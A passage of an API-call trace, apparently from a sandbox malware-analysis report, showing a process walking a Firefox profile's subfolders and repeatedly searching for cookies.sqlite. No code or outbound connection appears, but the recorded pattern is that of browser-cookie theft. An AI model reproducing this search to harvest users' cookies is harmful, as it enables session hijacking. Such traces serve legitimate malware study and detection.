pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\cookies.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\cookies.sqlite" [0250.933] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\cookies.sqlite", lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0xffffffffffffffff [0250.939] PathCombineW (in: pszDest=0x79b19b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\*" [0250.939] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\*", lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0x5c0f850 [0250.939] FindNextFileW (in: hFindFile=0x5c0f850, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 1 [0250.939] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.939] FindNextFileW (in: hFindFile=0x5c0f850, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 1 [0250.940] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.940] lstrlenW (lpString="1.6") returned 3 [0250.940] PathCombineW (in: pszDest=0x79b19b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264", pszFile="1.6" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6" [0250.940] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x64 [0250.940] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6", lpDst=0x79c5700, nSize=0x64 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6") returned 0x64 [0250.940] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6") returned 99 [0250.940] lstrlenW (lpString="cookies.sqlite") returned 14 [0250.940] PathCombineW (in: pszDest=0x79c57d0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6", pszFile="cookies.sqlite" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\cookies.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\cookies.sqlite" [0250.940] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\cookies.sqlite", lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 0xffffffffffffffff [0250.940] PathCombineW (in: pszDest=0x79c57d0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\*" [0250.940] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\*", lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 0x5c103f0 [0250.940] FindNextFileW (in: hFindFile=0x5c103f0, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 1 [0250.940] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.940] FindNextFileW (in: hFindFile=0x5c103f0, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 1 [0250.940] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.940] FindNextFileW (in: hFindFile=0x5c103f0, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 1 [0250.940] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.941] FindNextFileW (in: hFindFile=0x5c103f0, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 0 [0250.941] FindClose (in: hFindFile=0x5c103f0 | out: hFindFile=0x5c103f0) returned 1 [0250.941] FindNextFileW (in: hFindFile=0x5c0f850, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0 [0250.941] FindClose (in: hFindFile=0x5c0f850 | out: hFindFile=0x5c0f850) returned 1 [0250.941] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0250.941] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.941] lstrlenW (lpString="gmp-widevinecdm") returned 15 [0250.941] PathCombineW (in: pszDest=0x79b1400, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="gmp-widevinecdm" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm" [0250.941] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x60 [0250.941] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm", lpDst=0x7aaf3a0, nSize=0x60 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm") returned 0x60 [0250.941] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm") returned 95 [0250.941] lstrlenW (lpString="cookies.sqlite") returned 14 [0250.941] PathCombineW (in: pszDest=0x79b19b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm", pszFile="cookies.sqlite" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\cookies.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\cookies.sqlite" [0250.941] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\cookies.sqlite", lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0xffffffffffffffff [0251.206] PathCombineW (in: pszDest=0x79b19b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\*" [0251.206] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\*", lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0x5c0f970 [0251.206] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 1 [0251.206] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.206] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 1 [0251.206] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.206] lstrlenW (lpString="1.4.8.903") returned 9 [0251.206] PathCombineW (in: pszDest=0x79b19b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm", pszFile="1.4.8.903" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903" [0251.206] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x6a [0251.206] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903", lpDst=0x79c5700, nSize=0x6a | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903") returned 0x6a [0251.206] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903") returned 105 [0251.206] lstrlenW (lpString="cookies.sqlite") returned 14 [0251.207] PathCombineW (in: pszDest=0x79c57e0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903", pszFile="cookies.sqlite" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\cookies.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\cookies.sqlite" [0251.207] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\cookies.sqlite", lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 0xffffffffffffffff [0251.210] PathCombineW (in: pszDest=0x79c57e0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\*" [0251.210] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\*", lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 0x5c0feb0 [0251.210] FindNextFileW (in: hFindFile=0x5c0feb0, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 1 [0251.210] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.211] FindNextFileW (in: hFindFile=0x5c0feb0, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 1 [0251.211] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.211] FindNextFileW (in: hFindFile=0x5c0feb0, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 1 [0251.211] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.211] FindNextFileW (in: hFindFile=0x5c0feb0, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 1 [0251.211] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.211] FindNextFileW (in: hFindFile=0x5c0feb0, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 1 [0251.211] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.211] FindNextFileW (in: hFindFile=0x5c0feb0, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 0 [0251.211] FindClose (in: hFindFile=0x5c0feb0 | out: hFindFile=0x5c0feb0) returned 1 [0251.211] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0 [0251.212] FindClose (in: hFindFile=0x5c0f970 | out: hFindFile=0x5c0f970) returned 1 [0251.212] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0251.212] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.212] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0251.212] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.212] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0251.212] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.212] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0251.212] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.212] lstrlenW (lpString="minidumps") returned 9 [0251.212] PathCombineW (in: pszDest=0x79b1400, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="minidumps" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps" [0251.212] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5a [0251.212] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps", lpDst=0x7aaf3a0, nSize=0x5a | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps") returned 0x5a [0251.212] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps") returned 89 [0251.212] lstrlenW (lpString="cookies.sqlite") returned 14 [0251.212] PathCombineW (in: pszDest=0x79b19b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps", pszFile="cookies.sqlite" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\cookies.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\cookies.sqlite" [0251.212] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\cookies.sqlite", lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0xffffffffffffffff [0251.218] PathCombineW (in: pszDest=0x79b19b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\*" [0251.218] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\minidumps\\*", lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0x5c103f0 [0251.218] FindNextFileW (in: hFindFile=0x5c103f0, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 1 [0251.218] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.218] FindNextFileW (in: hFindFile=0x5c103f0, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0 [0251.218] FindClose (in: hFindFile=0x5c103f0 | out: hFindFile=0x5c103f0) returned 1 [0251.219] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0251.219] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.219] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0251.219] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.219] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0251.219] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.219] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0251.219] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.219] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0251.219] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.219] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0251.219] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.219] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0251.219] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.219] lstrlenW (lpString="saved-telemetry-pings") returned 21 [0251.219] PathCombineW (in: pszDest=0x79b1400, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="saved-telemetry-pings" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings" [0251.219] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x66 [0251.219] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings", lpDst=0x79b19b0, nSize=0x66 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings") returned 0x66 [0251.219] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings") returned 101 [0251.219] lstrlenW (lpString="cookies.sqlite") returned 14 [0251.219] PathCombineW (in: pszDest=0x79c54a0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings", pszFile="cookies.sqlite" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\cookies.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\cookies.sqlite" [0251.219] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\cookies.sqlite", lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0xffffffffffffffff [0251.223] PathCombineW (in: pszDest=0x79c54a0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\*" [0251.223] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\saved-telemetry-pings\\*", lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0x5c103f0 [0251.223] FindNextFileW (in: hFindFile=0x5c103f0, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 1 [0251.223] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.223] FindNextFileW (in: hFindFile=0x5c103f0, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 1 [0251.223] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.223] FindNextFileW (in: hFindFile=0x5c103f0, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0 [0251.223] FindClose (in: hFindFile=0x5c103f0 | out: hFindFile=0x5c103f0) returned 1 [0251.224] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0251.226] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.226] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0251.226] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.226] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0251.226] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.226] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0251.226] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.226] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0251.226] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.226] lstrlenW (lpString="sessionstore-backups") returned 20 [0251.226] PathCombineW (in: pszDest=0x79b1400, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="sessionstore-backups" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups" [0251.226] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x65 [0251.226] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups", lpDst=0x79b19b0, nSize=0x65 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups") returned 0x65 [0251.226] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups") returned 100 [0251.226] lstrlenW (lpString="cookies.sqlite") returned 14 [0251.226] PathCombineW (in: pszDest=0x79c54a0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups", pszFile="cookies.sqlite" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\cookies.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\cookies.sqlite" [0251.226] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\cookies.sqlite", lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0xffffffffffffffff [0251.240] PathCombineW (in: pszDest=0x79c54a0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\*") 